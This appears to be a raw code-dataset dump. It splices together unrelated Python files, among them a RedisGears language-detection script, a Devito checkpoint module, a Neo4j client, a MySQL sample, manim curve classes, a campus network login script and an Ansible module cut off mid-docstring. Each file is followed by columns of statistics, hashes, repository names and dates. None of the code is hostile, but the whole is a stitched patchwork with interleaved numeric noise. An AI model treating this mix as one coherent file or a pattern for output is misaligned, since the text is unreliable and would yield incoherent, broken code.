denormalized = [(p * sd + mu).tolist() for p in points] for i, p in enumerate(denormalized): p[3] = points[i][3] yield denormalized, transcription class H5pySource(BaseSource): def __init__(self, h5py_ds, random_order=True): self._h5py = h5py_ds self._random = random_order def __len__(self): return len(self._h5py) def get_sequences(self): return self._h5py.get_data(random_order=self._random) class PreprocessedSource(BaseSourceWrapper): def __init__(self, source, preprocessor): super().__init__(source) self._preprocessor = preprocessor def get_sequences(self): for xs, ys in self._source.get_sequences(): yield self._preprocessor.pre_process_example(xs, ys) class ConstrainedSource(BaseSourceWrapper): def __init__(self, source, num_lines): super().__init__(source) self._num_lines = num_lines self._use_all = (num_lines == 0) def get_sequences(self): for j, (seq_in, seq_out) in enumerate(self._source.get_sequences()): #print(j, seq_out) if j % 500 == 0: print('Fetched {} examples'.format(j)) if j >= self._num_lines and not self._use_all: break yield seq_in, seq_out class PlainListSource(BaseSourceWrapper): def get_sequences(self): for strokes, t in self._source.get_sequences(): points = [stroke.points for stroke in strokes] yield points, t
26.038136
87
0.588771
757
6,145
4.498018
0.198151
0.085169
0.032305
0.0558
0.314244
0.247577
0.208517
0.200587
0.174449
0.174449
0
0.008201
0.305452
6,145
235
88
26.148936
0.789597
0.014646
0
0.284848
0
0
0.00694
0
0
0
0
0
0
1
0.224242
false
0
0.030303
0.060606
0.406061
0.006061
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
914899652debcd6bf278b6bcd59488d3ca01a934
349
py
Python
lang_detect_gears.py
AlexMikhalev/cord19redisknowledgegraph
a143415aca8d4a6db820dc7a25280045f421a665
[ "Apache-2.0" ]
7
2020-05-18T09:25:17.000Z
2021-08-05T00:23:36.000Z
lang_detect_gears.py
maraqa1/CORD-19
a473f7b60b8dfa476ea46505678481e4b361d04e
[ "Apache-2.0" ]
10
2020-05-31T14:44:26.000Z
2022-03-25T19:17:37.000Z
lang_detect_gears.py
maraqa1/CORD-19
a473f7b60b8dfa476ea46505678481e4b361d04e
[ "Apache-2.0" ]
null
null
null
from langdetect import detect

def detect_language(x):
    #detect language of the article
    try:
        lang=detect(x['value'])
    except:
        lang="empty"
    execute('SET', 'lang_article:' + x['key'], lang)
    if lang!='en':
        execute('SADD','titles_to_delete', x['key'])

gb = GB()
gb.foreach(detect_language)
gb.run('title:*')
23.266667
52
0.60745
47
349
4.404255
0.595745
0.202899
0
0
0
0
0
0
0
0
0
0
0.22063
349
15
53
23.266667
0.761029
0.08596
0
0
0
0
0.191223
0
0
0
0
0
0
1
0.083333
false
0
0.083333
0
0.166667
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
914cca42f7c78c12fb45153e185381ce97dc5240
5,200
py
Python
seismic/checkpointing/checkpoint.py
slimgroup/Devito-Examples
449e1286a18ebc4172069372ba2bf3cd2ec99a2f
[ "MIT" ]
7
2020-08-19T18:23:08.000Z
2022-02-18T19:19:24.000Z
seismic/checkpointing/checkpoint.py
slimgroup/Devito-Examples
449e1286a18ebc4172069372ba2bf3cd2ec99a2f
[ "MIT" ]
null
null
null
seismic/checkpointing/checkpoint.py
slimgroup/Devito-Examples
449e1286a18ebc4172069372ba2bf3cd2ec99a2f
[ "MIT" ]
3
2020-12-01T22:17:09.000Z
2021-05-21T11:29:07.000Z
# The MIT License (MIT) # # Copyright (c) 2016, Imperial College, London # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in the # Software without restriction, including without limitation the rights to use, copy, # modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, subject to the # following conditions: # # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, # INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR # PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE # FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. from pyrevolve import Checkpoint, Operator from devito import TimeFunction from devito.tools import flatten class CheckpointOperator(Operator): """Devito's concrete implementation of the ABC pyrevolve.Operator. This class wraps devito.Operator so it conforms to the pyRevolve API. pyRevolve will call apply with arguments t_start and t_end. Devito calls these arguments t_s and t_e so the following dict is used to perform the translations between different names. Parameters ---------- op : Operator devito.Operator object that this object will wrap. args : dict If devito.Operator.apply() expects any arguments, they can be provided here to be cached. Any calls to CheckpointOperator.apply() will automatically include these cached arguments in the call to the underlying devito.Operator.apply(). """ t_arg_names = {'t_start': 'time_m', 't_end': 'time_M'} def __init__(self, op, **kwargs): self.op = op self.args = kwargs op_default_args = self.op._prepare_arguments(**kwargs) self.start_offset = op_default_args[self.t_arg_names['t_start']] def _prepare_args(self, t_start, t_end): args = self.args.copy() args[self.t_arg_names['t_start']] = t_start + self.start_offset args[self.t_arg_names['t_end']] = t_end - 1 + self.start_offset return args def apply(self, t_start, t_end): """ If the devito operator requires some extra arguments in the call to apply they can be stored in the args property of this object so pyRevolve calls pyRevolve.Operator.apply() without caring about these extra arguments while this method passes them on correctly to devito.Operator """ # Build the arguments list to invoke the kernel function args = self.op.arguments(**self._prepare_args(t_start, t_end)) # Invoke kernel function with args arg_values = [args[p.name] for p in self.op.parameters] self.op.cfunction(*arg_values) class DevitoCheckpoint(Checkpoint): """Devito's concrete implementation of the Checkpoint abstract base class provided by pyRevolve. Holds a list of symbol objects that hold data. """ def __init__(self, objects): """Intialise a checkpoint object. 
Upon initialisation, a checkpoint stores only a reference to the objects that are passed into it.""" assert(all(isinstance(o, TimeFunction) for o in objects)) dtypes = set([o.dtype for o in objects]) assert(len(dtypes) == 1) self._dtype = dtypes.pop() self.objects = objects @property def dtype(self): return self._dtype def get_data(self, timestep): data = flatten([get_symbol_data(s, timestep) for s in self.objects]) return data def get_data_location(self, timestep): return self.get_data(timestep) @property def size(self): """The memory consumption of the data contained in a checkpoint.""" return sum([int((o.size_allocated/(o.time_order+1))*o.time_order) for o in self.objects]) def save(*args): raise RuntimeError("Invalid method called. Did you check your version" + " of pyrevolve?") def load(*args): raise RuntimeError("Invalid method called. Did you check your version" + " of pyrevolve?") def get_symbol_data(symbol, timestep): timestep += symbol.time_order - 1 ptrs = [] for i in range(symbol.time_order): # Use `._data`, instead of `.data`, as `.data` is a view of the DOMAIN # data region which is non-contiguous in memory. The performance hit from # dealing with non-contiguous memory is so big (introduces >1 copy), it's # better to checkpoint unneccesarry stuff to get a contiguous chunk of memory. ptr = symbol._data[timestep - i, :, :] ptrs.append(ptr) return ptrs
44.067797
129
0.68
722
5,200
4.804709
0.347645
0.025368
0.010378
0.011531
0.105794
0.081868
0.057077
0.043817
0.043817
0.043817
0
0.002288
0.243462
5,200
117
130
44.444444
0.879512
0.533269
0
0.117647
0
0
0.076023
0
0
0
0
0
0.039216
1
0.215686
false
0
0.058824
0.039216
0.45098
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
914dad243b4f6fd43e52b214d9db3b5771ad2444
623
py
Python
Perforce/AppUtils.py
TomMinor/MayaPerforce
52182c7e5c3e91e41973d0c2abbda8880e809e49
[ "MIT" ]
13
2017-03-31T21:52:19.000Z
2021-09-06T23:15:30.000Z
Perforce/AppUtils.py
TomMinor/MayaPerforce
52182c7e5c3e91e41973d0c2abbda8880e809e49
[ "MIT" ]
3
2017-05-08T02:27:43.000Z
2017-05-10T03:20:11.000Z
Perforce/AppUtils.py
TomMinor/MayaPerforce
52182c7e5c3e91e41973d0c2abbda8880e809e49
[ "MIT" ]
3
2017-05-05T14:03:03.000Z
2020-05-25T10:25:04.000Z
import os
import sys
import re
import logging

p4_logger = logging.getLogger("Perforce")

# Import app specific utilities, maya opens scenes differently than nuke etc
# Are we in maya or nuke?
if re.match( "maya", os.path.basename( sys.executable ), re.I ):
    p4_logger.info("Configuring for Maya")
    from MayaUtils import *
elif re.match( "nuke", os.path.basename( sys.executable ), re.I ):
    p4_logger.info("Configuring for Nuke")
    from NukeUtils import *
else:
    p4_logger.warning("Couldn't find app configuration")
    raise ImportError("No supported applications found that this plugin can interface with")
32.789474
90
0.738363
91
623
5.010989
0.593407
0.070175
0.061404
0.074561
0.245614
0.245614
0.245614
0.245614
0.245614
0.245614
0
0.007678
0.163724
623
18
91
34.611111
0.867562
0.157303
0
0
0
0
0.305556
0
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
e66dd75ae0bf7e3d43a0a0b5833ef2c98e86a332
581
py
Python
tests/conftest.py
artembashlak/share-youtube-to-mail
347f72ed8846b85cae8e4f39896ab54e698a6de9
[ "Apache-2.0" ]
null
null
null
tests/conftest.py
artembashlak/share-youtube-to-mail
347f72ed8846b85cae8e4f39896ab54e698a6de9
[ "Apache-2.0" ]
null
null
null
tests/conftest.py
artembashlak/share-youtube-to-mail
347f72ed8846b85cae8e4f39896ab54e698a6de9
[ "Apache-2.0" ]
null
null
null
import pytest
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager


@pytest.fixture(scope="function")
def browser():
    options = webdriver.ChromeOptions()
    options.add_argument('ignore-certificate-errors')
    options.add_argument("--headless")
    options.add_argument('--no-sandbox')
    options.add_argument('start-maximized')
    options.add_argument('disable-infobars')
    options.add_argument("--disable-extensions")
    driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
    yield driver
    driver.quit()
30.578947
79
0.753873
62
581
6.951613
0.516129
0.139211
0.25058
0.116009
0
0
0
0
0
0
0
0
0.123924
581
18
80
32.277778
0.846758
0
0
0
0
0
0.182444
0.043029
0
0
0
0
0
1
0.066667
false
0
0.2
0
0.266667
0
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e66e53547faa705c9a68f28dba07b4048f2f1b31
2,335
py
Python
crusoe_observe/neo4j-client/neo4jclient/CMSClient.py
CSIRT-MU/CRUSOE
73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b
[ "MIT" ]
3
2021-11-09T09:55:17.000Z
2022-02-19T02:58:27.000Z
crusoe_observe/neo4j-client/neo4jclient/CMSClient.py
CSIRT-MU/CRUSOE
73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b
[ "MIT" ]
null
null
null
crusoe_observe/neo4j-client/neo4jclient/CMSClient.py
CSIRT-MU/CRUSOE
73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b
[ "MIT" ]
null
null
null
from neo4jclient.AbsClient import AbstractClient


class CMSClient(AbstractClient):
    def __init__(self, password, **kwargs):
        super().__init__(password=password, **kwargs)

    def get_domain_names(self):
        """
        Gets all domain names from database.
        :return: domain names in JSON-like form
        """
        return self._run_query("MATCH(n:DomainName) RETURN n.domain_name AS domains")

    def get_ips_and_domain_names(self):
        """
        Gets all domain names with corresponding IPs from database.
        :return: IPs and DomainNames in JSON-like form
        """
        return self._run_query("MATCH(n:IP)-[:RESOLVES_TO]-(y:DomainName {tag: \'A/AAAA\'}) "
                               "RETURN { IP: n.address , Domain: y.domain_name } AS entry")

    def create_cms_component(self, path):
        """
        Create nodes and relationships for cms client.
        -------------
        Antivirus_query:
        1. Parse csv given in path.
        2. Create node of type [:SoftwareVersion, :IP] if not already exists.
        3. Create node of type [:Host], relationship of type [:ON] with parameters [start,end] if not already exists.
        Otherwise just update information about time on parameters [start,end].
        4. Create node of type [:Node], relationship of type [:HAS_ASSIGNED].
        5. Create relationship of type [:IS_A] between :Host and :Node if not already exists.

        :param path: Path to the JSON with values
        :return:
        """
        path = f'file:///{path}'

        query = "CALL apoc.load.json($path) " \
                "YIELD value " \
                "UNWIND value.data AS data " \
                "UNWIND data.cpe as cpe " \
                "WITH data.ip as ip_ad, cpe, value.time as theTime " \
                "MERGE (ipadd:IP {address: ip_ad}) " \
                "MERGE (softVersion:SoftwareVersion {version: cpe, tag: \'cms_client\'}) " \
                "MERGE (ipadd)<-[:HAS_ASSIGNED]-(nod:Node) " \
                "MERGE (nod)-[:IS_A]->(host:Host) " \
                "MERGE (softVersion)-[r:ON]->(host) " \
                "ON CREATE SET r.start = datetime(theTime),r.end = datetime(theTime) " \
                "ON MATCH SET r.end = datetime(theTime)"

        params = {'path': path}

        self._run_query(query, **params)
39.576271
117
0.576017
282
2,335
4.652482
0.393617
0.027439
0.027439
0.036585
0.108232
0.108232
0.108232
0.057927
0.057927
0.057927
0
0.003672
0.300214
2,335
58
118
40.258621
0.799266
0.321627
0
0
0
0
0.455571
0.141749
0
0
0
0
0
1
0.16
false
0.08
0.04
0
0.32
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e671c98e986dfbf41b15884e3c4cc078b893ecb2
1,040
py
Python
Python/problem1150.py
1050669722/LeetCode-Answers
c8f4d1ccaac09cda63b60d75144335347b06dc81
[ "MIT" ]
null
null
null
Python/problem1150.py
1050669722/LeetCode-Answers
c8f4d1ccaac09cda63b60d75144335347b06dc81
[ "MIT" ]
null
null
null
Python/problem1150.py
1050669722/LeetCode-Answers
c8f4d1ccaac09cda63b60d75144335347b06dc81
[ "MIT" ]
null
null
null
from typing import List
from collections import Counter

# class Solution:
#     def isMajorityElement(self, nums: List[int], target: int) -> bool:
#         d = Counter(nums)
#         return d[target] > len(nums)//2

# class Solution:
#     def isMajorityElement(self, nums: List[int], target: int) -> bool:
#         ans = 0
#         for num in nums:
#             if num == target:
#                 ans += 1
#         return ans > len(target)//2

class Solution:
    def isMajorityElement(self, nums: List[int], target: int) -> bool:
        if not nums:
            return False
        if len(nums) == 1:
            return nums[0] == target
        p, q = 0, len(nums)-1
        while p < q:
            if nums[p] > target:
                return False
            elif nums[p] < target:
                p += 1
            if nums[q] < target:
                return False
            elif nums[q] > target:
                q -= 1
        if nums[p] == nums[q] == target:
            return q - p + 1 > len(nums)//2
25.365854
72
0.476923
125
1,040
3.968
0.256
0.056452
0.096774
0.199597
0.47379
0.372984
0.372984
0.372984
0.372984
0.372984
0
0.019386
0.404808
1,040
40
73
26
0.781906
0.356731
0
0.15
0
0
0
0
0
0
0
0
0
1
0.05
false
0
0.1
0
0.45
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6774fb2431795bf70a9da58c9b195ced57c3c9e
839
py
Python
dev-template/src/mysql_connect_sample.py
arrowkato/pytest-CircleiCI
2f6a1460a48bf88547538cfc72880a9c86f9ec23
[ "MIT" ]
null
null
null
dev-template/src/mysql_connect_sample.py
arrowkato/pytest-CircleiCI
2f6a1460a48bf88547538cfc72880a9c86f9ec23
[ "MIT" ]
10
2020-08-24T00:25:06.000Z
2020-11-08T03:58:48.000Z
dev-template/src/mysql_connect_sample.py
arrowkato/pytest-CircleiCI
2f6a1460a48bf88547538cfc72880a9c86f9ec23
[ "MIT" ]
null
null
null
import mysql.connector
from mysql.connector import errorcode

config = {
    'user': 'user',
    'password': 'password',
    'host': 'mysql_container',
    'database': 'sample_db',
    'port': '3306',
}

if __name__ == "__main__":
    try:
        conn = mysql.connector.connect(**config)
        cursor = conn.cursor()
        cursor.execute('select * from users')
        for row in cursor.fetchall():
            print("name:" + str(row[0]) + "" + "time_zone_id" + str(row[1]))
        conn.close()
    except mysql.connector.Error as err:
        if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
            print("Something is wrong with your user name or password")
        elif err.errno == errorcode.ER_BAD_DB_ERROR:
            print("Database does not exist")
        else:
            print(err)
    else:
        conn.close()
28.931034
76
0.587604
99
839
4.79798
0.575758
0.117895
0.071579
0.08
0
0
0
0
0
0
0
0.009885
0.27652
839
28
77
29.964286
0.772652
0
0
0.153846
0
0
0.220501
0
0
0
0
0
0
1
0
false
0.076923
0.076923
0
0.076923
0.153846
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e677b427e6603c8fe21acf94f00727cd3ed74b7a
920
py
Python
Mundo 1/ex011.py
viniciusbonito/CeV-Python-Exercicios
6182421332f6f0c0a567c3e125fdc05736fa6281
[ "MIT" ]
null
null
null
Mundo 1/ex011.py
viniciusbonito/CeV-Python-Exercicios
6182421332f6f0c0a567c3e125fdc05736fa6281
[ "MIT" ]
null
null
null
Mundo 1/ex011.py
viniciusbonito/CeV-Python-Exercicios
6182421332f6f0c0a567c3e125fdc05736fa6281
[ "MIT" ]
null
null
null
# criar um programa que pergunte as dimensões de uma parede, calcule sua área e informe quantos litros de tinta
# seriam necessários para a pintura, após perguntar o rendimento da tinta informado na lata

print('=' * 40)
print('{:^40}'.format('Assistente de pintura'))
print('=' * 40)

altura = float(input('Informe a altura da parede em metros: '))
largura = float(input('Informe a largura da parede em metros: '))
area = altura * largura
print('\nA área total da parede é de {:.2f}m²'.format(area))

litros = float(input('\nQuantos litros contém a lata de tinta escolhida? '))
rendlata = float(input('Qual o rendimento em metros informado na lata? '))
rendlitro = rendlata / litros

print('\nSe a lata possui {:.2f}L e rende {:.2f}m²'.format(litros, rendlata))
print('então o rendimento por litro é de {:.2f}m²'.format(rendlitro))
print('\nSerão necessário {:.2f}L para pintar toda a parede'.format(area / rendlitro))
46
111
0.723913
142
920
4.690141
0.443662
0.06006
0.045045
0.054054
0.039039
0
0
0
0
0
0
0.017834
0.146739
920
20
112
46
0.830573
0.216304
0
0.153846
0
0
0.527121
0
0
0
0
0
0
1
0
false
0
0
0
0
0.538462
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e677b75c2a6dcc29dc727e2cdc804229c99df35d
591
py
Python
Python/Mundo 3/ex088.py
henrique-tavares/Coisas
f740518b1bedec5b0ea8c12ae07a2cac21eb51ae
[ "MIT" ]
1
2020-02-07T20:39:26.000Z
2020-02-07T20:39:26.000Z
Python/Mundo 3/ex088.py
neptune076/Coisas
85c064cc0e134465aaf6ef41acf747d47f108fc9
[ "MIT" ]
null
null
null
Python/Mundo 3/ex088.py
neptune076/Coisas
85c064cc0e134465aaf6ef41acf747d47f108fc9
[ "MIT" ]
null
null
null
from random import sample
from time import sleep

jogos = list()

print('-' * 20)
print(f'{"MEGA SENA":^20}')
print('-' * 20)

while True:
    n = int(input("\nQuatos jogos você quer que eu sorteie? "))
    if (n > 0):
        break
    print('\n[ERRO] Valor fora do intervalo')

print()
print('-=' * 3, end=' ')
print(f'SORTEANDO {n} JOGOS', end=' ')
print('-=' * 3)

for i in range(n):
    jogos.append(sample(range(1,61), 6))
    sleep(0.6)
    print(f'Jogo {i+1}: {jogos[i]}')

print('-=' * 5, end=' ')
print('< BOA SORTE >', end=' ')
print('-=' * 3, end='\n\n')
17.909091
63
0.527919
88
591
3.545455
0.534091
0.102564
0.057692
0
0
0
0
0
0
0
0
0.040089
0.240271
591
33
64
17.909091
0.654788
0
0
0.090909
0
0
0.273649
0
0
0
0
0
0
1
0
false
0
0.090909
0
0.090909
0.545455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e678937ffa958feedad60c6818f9966146fc7fd7
229
py
Python
tests/list/list03.py
ktok07b6/polyphony
657c5c7440520db6b4985970bd50547407693ac4
[ "MIT" ]
83
2015-11-30T09:59:13.000Z
2021-08-03T09:12:28.000Z
tests/list/list03.py
jesseclin/polyphony
657c5c7440520db6b4985970bd50547407693ac4
[ "MIT" ]
4
2017-02-10T01:43:11.000Z
2020-07-14T03:52:25.000Z
tests/list/list03.py
jesseclin/polyphony
657c5c7440520db6b4985970bd50547407693ac4
[ "MIT" ]
11
2016-11-18T14:39:15.000Z
2021-02-23T10:05:20.000Z
from polyphony import testbench

def list03(x, y, z):
    a = [1, 2, 3]
    r0 = x
    r1 = y
    a[r0] = a[r1] + z
    return a[r0]

@testbench
def test():
    assert 4 == list03(0, 1 ,2)
    assert 5 == list03(2, 1 ,3)

test()
14.3125
31
0.515284
41
229
2.878049
0.512195
0.20339
0
0
0
0
0
0
0
0
0
0.141026
0.318777
229
15
32
15.266667
0.615385
0
0
0
0
0
0
0
0
0
0
0
0.166667
1
0.166667
false
0
0.083333
0
0.333333
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e67abeee75de516885fc3f200a8feafafe7fd320
2,313
py
Python
manimlib/mobject/functions.py
parmentelat/manim
f05f94fbf51c70591bed3092587a5db0de439738
[ "MIT" ]
1
2021-02-04T12:54:36.000Z
2021-02-04T12:54:36.000Z
manimlib/mobject/functions.py
parmentelat/manim
f05f94fbf51c70591bed3092587a5db0de439738
[ "MIT" ]
null
null
null
manimlib/mobject/functions.py
parmentelat/manim
f05f94fbf51c70591bed3092587a5db0de439738
[ "MIT" ]
null
null
null
from manimlib.constants import * from manimlib.mobject.types.vectorized_mobject import VMobject from manimlib.utils.config_ops import digest_config from manimlib.utils.space_ops import get_norm class ParametricCurve(VMobject): CONFIG = { "t_range": [0, 1, 0.1], "min_samples": 10, "epsilon": 1e-8, # TODO, automatically figure out discontinuities "discontinuities": [], "smoothing": True, } def __init__(self, t_func, t_range=None, **kwargs): digest_config(self, kwargs) if t_range is not None: self.t_range[:len(t_range)] = t_range # To be backward compatible with all the scenes specifying t_min, t_max, step_size self.t_range = [ kwargs.get("t_min", self.t_range[0]), kwargs.get("t_max", self.t_range[1]), kwargs.get("step_size", self.t_range[2]), ] self.t_func = t_func VMobject.__init__(self, **kwargs) def get_point_from_function(self, t): return self.t_func(t) def init_points(self): t_min, t_max, step = self.t_range jumps = np.array(self.discontinuities) jumps = jumps[(jumps > t_min) & (jumps < t_max)] boundary_times = [t_min, t_max, *(jumps - self.epsilon), *(jumps + self.epsilon)] boundary_times.sort() for t1, t2 in zip(boundary_times[0::2], boundary_times[1::2]): t_range = [*np.arange(t1, t2, step), t2] points = np.array([self.t_func(t) for t in t_range]) self.start_new_path(points[0]) self.add_points_as_corners(points[1:]) if self.smoothing: self.make_smooth() return self class FunctionGraph(ParametricCurve): CONFIG = { "color": YELLOW, "x_range": [-8, 8, 0.25], } def __init__(self, function, x_range=None, **kwargs): digest_config(self, kwargs) self.function = function if x_range is not None: self.x_range[:len(x_range)] = x_range def parametric_function(t): return [t, function(t), 0] super().__init__(parametric_function, self.x_range, **kwargs) def get_function(self): return self.function def get_point_from_function(self, x): return self.t_func(x)
31.684932
90
0.609166
313
2,313
4.239617
0.28115
0.058779
0.045215
0.030143
0.165787
0.096458
0.055765
0
0
0
0
0.016598
0.270644
2,313
72
91
32.125
0.770006
0.054907
0
0.071429
0
0
0.036647
0
0
0
0
0.013889
0
1
0.125
false
0
0.071429
0.071429
0.357143
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
e68358c694510e180fb49e743ec559c977aea7b6
1,467
py
Python
src/HandNetwork.py
xausky/hand-network
e885003c5bb9157cd06dc3ea3aabddbb7162a0ab
[ "MIT" ]
2
2017-04-18T03:31:06.000Z
2017-06-08T10:27:59.000Z
src/HandNetwork.py
xausky/hand-network
e885003c5bb9157cd06dc3ea3aabddbb7162a0ab
[ "MIT" ]
null
null
null
src/HandNetwork.py
xausky/hand-network
e885003c5bb9157cd06dc3ea3aabddbb7162a0ab
[ "MIT" ]
null
null
null
#!/usr/bin/python3
#-*- coding: utf-8 -*-
import urllib.parse
import json
import base64
import requests
import logging

class Network():
    LOGIN_URL = 'http://192.168.211.101/portal/pws?t=li'
    BEAT_URL = 'http://192.168.211.101/portal/page/doHeartBeat.jsp'
    COMMON_HERADERS = {
        'Accept-Language': 'en-US',
        'Accept': 'text/html'
    }

    def __init__(self, username, password):
        b64Password = base64.b64encode(bytes(password,'utf8'))
        self.data = {'userName': username, 'userPwd': b64Password}

    def login(self):
        logging.info('login:%s'%(self.data))
        response = requests.post(Network.LOGIN_URL, data=self.data, headers=Network.COMMON_HERADERS, timeout=3)
        responseText = base64.b64decode(response.text + '==')
        responseJson = urllib.parse.unquote(responseText.decode('utf8'))
        jsonDict = json.loads(responseJson)
        heartBeatCyc = jsonDict.get('heartBeatCyc')
        if heartBeatCyc == None:
            raise BaseException(responseJson)
        logging.info('login seccuss: %s'%(responseJson))
        self.heartBeatCyc = int(heartBeatCyc)
        self.serialNo = jsonDict.get('serialNo')
        return self.heartBeatCyc

    def beat(self):
        response = requests.post(Network.BEAT_URL, data={'serialNo': self.serialNo}, headers=Network.COMMON_HERADERS, timeout=3)
        if response.text.find('v_failedTimes') is -1:
            raise BaseException(response.text)
36.675
84
0.657805
166
1,467
5.740964
0.46988
0.044071
0.03148
0.027282
0.128017
0.128017
0.052466
0
0
0
0
0.03856
0.204499
1,467
39
85
37.615385
0.778063
0.025903
0
0.058824
0
0
0.149965
0
0
0
0
0
0
1
0.088235
false
0.088235
0.147059
0
0.382353
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e6885b17b97915311f8a8bd86b9f72a31641ef6d
7,392
py
Python
plugins/modules/oci_database_management_object_privilege_facts.py
LaudateCorpus1/oci-ansible-collection
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
[ "Apache-2.0" ]
null
null
null
plugins/modules/oci_database_management_object_privilege_facts.py
LaudateCorpus1/oci-ansible-collection
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
[ "Apache-2.0" ]
null
null
null
plugins/modules/oci_database_management_object_privilege_facts.py
LaudateCorpus1/oci-ansible-collection
2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # Copyright (c) 2020, 2022 Oracle and/or its affiliates. # This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license. # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Apache License v2.0 # See LICENSE.TXT for details. # GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { "metadata_version": "1.1", "status": ["preview"], "supported_by": "community", } DOCUMENTATION = """ --- module: oci_database_management_object_privilege_facts short_description: Fetches details about one or multiple ObjectPrivilege resources in Oracle Cloud Infrastructure description: - Fetches details about one or multiple ObjectPrivilege resources in Oracle Cloud Infrastructure - Gets the list of Object Privileges granted for the specified user. version_added: "2.9.0" author: Oracle (@oracle) options: managed_database_id: description: - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the Managed Database. type: str required: true user_name: description: - The name of the user whose details are to be viewed. type: str required: true name: description: - A filter to return only resources that match the entire name. type: str sort_by: description: - The field to sort information by. Only one sortOrder can be used. The default sort order for 'NAME' is ascending. The 'NAME' sort order is case-sensitive. type: str choices: - "NAME" sort_order: description: - The option to sort information in ascending ('ASC') or descending ('DESC') order. Ascending order is the default order. type: str choices: - "ASC" - "DESC" extends_documentation_fragment: [ oracle.oci.oracle ] """ EXAMPLES = """ - name: List object_privileges oci_database_management_object_privilege_facts: # required managed_database_id: "ocid1.manageddatabase.oc1..xxxxxxEXAMPLExxxxxx" user_name: user_name_example # optional name: name_example sort_by: NAME sort_order: ASC """ RETURN = """ object_privileges: description: - List of ObjectPrivilege resources returned: on success type: complex contains: name: description: - The name of the privilege on the object. returned: on success type: str sample: name_example schema_type: description: - The type of the object. returned: on success type: str sample: schema_type_example owner: description: - The owner of the object. returned: on success type: str sample: owner_example grantor: description: - The name of the user who performed the grant returned: on success type: str sample: grantor_example hierarchy: description: - Indicates whether the privilege was granted with the HIERARCHY OPTION (YES) or not (NO) returned: on success type: str sample: YES object: description: - The name of the object. The object can be any object, including tables, packages, indexes, sequences, and so on. returned: on success type: str sample: object_example grant_option: description: - Indicates whether the privilege was granted with the GRANT OPTION (YES) or not (NO) returned: on success type: str sample: YES common: description: - "Indicates how the grant was made. 
